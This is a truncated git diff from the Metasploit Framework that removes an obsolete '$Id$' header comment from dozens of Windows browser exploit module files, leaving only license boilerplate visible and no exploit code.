- ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb index c6da6cc4a4..80df38008f 100644 --- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb +++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index d13793d3e9..652467ca1b 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index aef14ef09c..be9664c5cb 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb index fc84b19268..1188c4f098 100644 --- a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb +++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index 919576c92b..5379280157 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/java_basicservice_impl.rb b/modules/exploits/windows/browser/java_basicservice_impl.rb index 9cf5d3329a..fa61f32270 100644 --- a/modules/exploits/windows/browser/java_basicservice_impl.rb +++ b/modules/exploits/windows/browser/java_basicservice_impl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index 37c85a0688..512737ac2b 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/java_docbase_bof.rb b/modules/exploits/windows/browser/java_docbase_bof.rb index c5806c4cb0..8b9024f0b0 100644 --- a/modules/exploits/windows/browser/java_docbase_bof.rb +++ b/modules/exploits/windows/browser/java_docbase_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb index da56d1f1f7..f1e9f5e00e 100644 --- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb +++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index 49030be23c..80d8d2827f 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb index e8fc8620c3..cd2c9b211e 100644 --- a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb +++ b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index 123c402041..9faf8d98e2 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index 6b9fc2a4c0..574b911edf 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb index fd472a09bf..d31eec99d1 100644 --- a/modules/exploits/windows/browser/lpviewer_url.rb +++ b/modules/exploits/windows/browser/lpviewer_url.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb index 0393948d07..217644a1fb 100644 --- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb +++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index 7a9d46b7db..a7eaf63953 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index 4943fb1b5f..3e911ebc58 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index 14c74adf0c..2020a8bbc0 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index bdfb6eeb25..c31c369193 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index 1948964000..d04db87275 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index 9ad7f69f6d..180f6311fe 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/mozilla_nstreerange.rb b/modules/exploits/windows/browser/mozilla_nstreerange.rb index bb6453a573..8cb1b15f2a 100644 --- a/modules/exploits/windows/browser/mozilla_nstreerange.rb +++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb index 59cf8dfa83..3c39e6c1cd 100644 --- a/modules/exploits/windows/browser/mozilla_reduceright.rb +++ b/modules/exploits/windows/browser/mozilla_reduceright.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index b7dbffec3f..2ee98f2602 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index b4583b26d8..fd64d0cd68 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb +++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index 56c9a9f122..fcfcfb0951 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb index bcc7c035d8..22efce39c9 100644 --- a/modules/exploits/windows/browser/ms06_055_vml_method.rb +++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb index a4109e736e..a3b25d2407 100644 --- a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb +++ b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms06_067_keyframe.rb b/modules/exploits/windows/browser/ms06_067_keyframe.rb index cf71fbf362..73886aea0a 100644 --- a/modules/exploits/windows/browser/ms06_067_keyframe.rb +++ b/modules/exploits/windows/browser/ms06_067_keyframe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index 10a2eaee4b..1696b99e89 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb index 2df9006175..86ec169f89 100644 --- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index 869d94a10d..9bccf2ce06 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb index b72d7e149b..cd5b11c3b9 100644 --- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb +++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb index a8da23ca34..b53607078b 100644 --- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index bb88b1eb43..c6e25875ab 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb index ea7e710a0b..659215e8ff 100644 --- a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb +++ b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb index 33bcf1f745..cb1b3b072f 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb index a30dbb3422..b7721d9759 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms09_072_style_object.rb b/modules/exploits/windows/browser/ms09_072_style_object.rb index 154bca2aa3..95578b2ab0 100644 --- a/modules/exploits/windows/browser/ms09_072_style_object.rb +++ b/modules/exploits/windows/browser/ms09_072_style_object.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms10_002_aurora.rb b/modules/exploits/windows/browser/ms10_002_aurora.rb index f7595fea39..e2aaa14a67 100644 --- a/modules/exploits/windows/browser/ms10_002_aurora.rb +++ b/modules/exploits/windows/browser/ms10_002_aurora.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb index b37eb3c522..c830294d00 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb index 2b7dad5bb4..7609fa7da6 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index bcf5104e9f..e1b428c919 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index eb7050bb60..50f3f92b38 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb index 26ab21b0ad..aaae2367ad 100644 --- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb +++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb index 86e7c70bf6..2eaa8e922a 100644 --- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index 4fa5f4a994..0aeaac5fe0 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index e46bbcc3ea..8306a557d3 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/msvidctl_mpeg2.rb b/modules/exploits/windows/browser/msvidctl_mpeg2.rb index 942530ff50..750524f7ff 100644 --- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb +++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/mswhale_checkforupdates.rb b/modules/exploits/windows/browser/mswhale_checkforupdates.rb index 50358bff2f..17ee1d1d24 100644 --- a/modules/exploits/windows/browser/mswhale_checkforupdates.rb +++ b/modules/exploits/windows/browser/mswhale_checkforupdates.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb index 61ba12d0c8..ed2060f8e4 100644 --- a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb +++ b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/nis2004_antispam.rb b/modules/exploits/windows/browser/nis2004_antispam.rb index d0e2b02975..cd162f9325 100644 --- a/modules/exploits/windows/browser/nis2004_antispam.rb +++ b/modules/exploits/windows/browser/nis2004_antispam.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb index b62a5083f0..68028d95db 100644 --- a/modules/exploits/windows/browser/nis2004_get.rb +++ b/modules/exploits/windows/browser/nis2004_get.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/novelliprint_callbackurl.rb b/modules/exploits/windows/browser/novelliprint_callbackurl.rb index d852e9f24c..2ac1dd3149 100644 --- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb +++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/novelliprint_datetime.rb b/modules/exploits/windows/browser/novelliprint_datetime.rb index 1d8b8f7db7..830ab82a1c 100644 --- a/modules/exploits/windows/browser/novelliprint_datetime.rb +++ b/modules/exploits/windows/browser/novelliprint_datetime.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb index 2416b4dc01..2c69e7aa9d 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb index 49e6e46105..0f83732a6e 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb index 1bcfd7a864..6fe009e8b3 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ### # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/novelliprint_target_frame.rb b/modules/exploits/windows/browser/novelliprint_target_frame.rb index ddc48f1a25..355ce95353 100644 --- a/modules/exploits/windows/browser/novelliprint_target_frame.rb +++ b/modules/exploits/windows/browser/novelliprint_target_frame.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb index 20efb436da..ea824475c9 100644 --- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb +++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/orbit_connecting.rb b/modules/exploits/windows/browser/orbit_connecting.rb index 0e8fef00a9..6229e62208 100644 --- a/modules/exploits/windows/browser/orbit_connecting.rb +++ b/modules/exploits/windows/browser/orbit_connecting.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb index 6e10e5a0c7..471b5fda93 100644 --- a/modules/exploits/windows/browser/pcvue_func.rb +++ b/modules/exploits/windows/browser/pcvue_func.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb index 063697dc73..4b533c2f11 100644 --- a/modules/exploits/windows/browser/persits_xupload_traversal.rb +++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb index da470108d6..d77e295278 100644 --- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb +++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb index b36b9eaab1..b062117d2c 100644 --- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb +++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb index 5b579df999..95ebaa38a8 100644 --- a/modules/exploits/windows/browser/realplayer_console.rb +++ b/modules/exploits/windows/browser/realplayer_console.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/realplayer_import.rb b/modules/exploits/windows/browser/realplayer_import.rb index 3dc62cd08e..3003ef4e1e 100644 --- a/modules/exploits/windows/browser/realplayer_import.rb +++ b/modules/exploits/windows/browser/realplayer_import.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb index dacabdebe1..fe58dfb7f3 100644 --- 